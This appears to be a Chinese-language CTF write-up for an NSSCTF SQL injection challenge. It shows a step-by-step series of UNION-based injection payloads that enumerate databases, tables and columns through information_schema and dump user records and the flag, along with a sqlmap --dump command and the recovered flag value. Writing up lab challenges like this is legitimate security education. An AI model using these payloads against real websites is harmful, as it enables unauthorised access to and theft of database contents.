做题过程
代码中给出了username和password两列,所以我们就可以不用使用order by 语句
查询所有的库
给出的sql语句可以看出闭合方式是(((((()))))),所以语句为
?id=-1)))))) union select schema_name,2 from information_schema.schemata%23
Array ( [0] => Array ( [username] => information_schema [password] => 2 ) [1] => Array ( [username] => mysql [password] => 2 ) [2] => Array ( [username] => ctftraining [password] => 2 ) [3] => Array ( [username] => performance_schema [password] => 2 ) [4] => Array ( [username] => test [password] => 2 ) [5] => Array ( [username] => ctf [password] => 2 ) )
查询ctf库
?id=-1)))))) union select database(),2%23
Array ( [0] => Array ( [username] => ctf [password] => 2 ) )
?id=-1)))))) union select group_concat(table_name),2 from information_schema.tables where table_schema='ctf'%23
//users
?id=-1)))))) union select group_concat(column_name),2 from information_schema.columns where table_name='users' and table_schema='ctf'%23
// id,username,password
?id=-1)))))) union select group_concat(id,0x7e,username,0x7e,password),2 from users%23
//1~tanji~OHHHHHHH,2~fake_flag~F1rst_to_Th3_eggggggggg!}
//假的flag
查询ctfraing库
?id=-1)))))) union select group_concat(table_name),2 from information_schema.tables where table_schema='ctftraining'%23
Array ( [0] => Array ( [username] => flag,news,users [password] => 2 ) )
// flag,news,users
?id=-1)))))) union select group_concat(column_name),2 from information_schema.columns where table_name='flag' and ='ctftraining'%23
Array ( [0] => Array ( [username] => flag [password] => 2 ) )
//flag
?id=-1)))))) union select group_concat(column_name),2 from information_schema.columns where table_name='news' and table_schema='ctftraining'%23
//id,title,content,time
?id=-1)))))) union select group_concat(column_name),2 from information_schema.columns where table_name='users' and table_schema='ctftraining'%23
//id,username,password,ip,time
?id=-1)))))) union select group_concat(id,0x7e,title,0x7e,content,0x7e,time),2 from news where table_schema='ctftraining'%23
//0 results
?id=-1)))))) union select group_concat(id,0x7e,username,0x7e,password,0x7e,ip),2 from users where table_schema='ctftraining'%23
//0 results
?id=-1)))))) union select flag,2 from flag where table_schema='ctftraining'%23
//0 results
怎么会是空的呢????
可能是语句的问题,我们使用Sqlmap直接跑:
sqlmap -u http://node5.anna.nssctf.cn:28051/index.php?id=1 -D "ctftraining" -T flag -C flag --dump
//NSSCTF{4cae7b33-2369-4fc6-8d2f-96703f010fd5}
经过测试,发现了table_schema只是内置库的字段,我们这里指定数据库查询应该用:库名.表名的形式
?id=-1)))))) union select flag,2 from ctftraining.flag%23
// NSSCTF{4cae7b33-2369-4fc6-8d2f-96703f010fd5}
参考了NSSCTF平台上clqwsn师傅的wp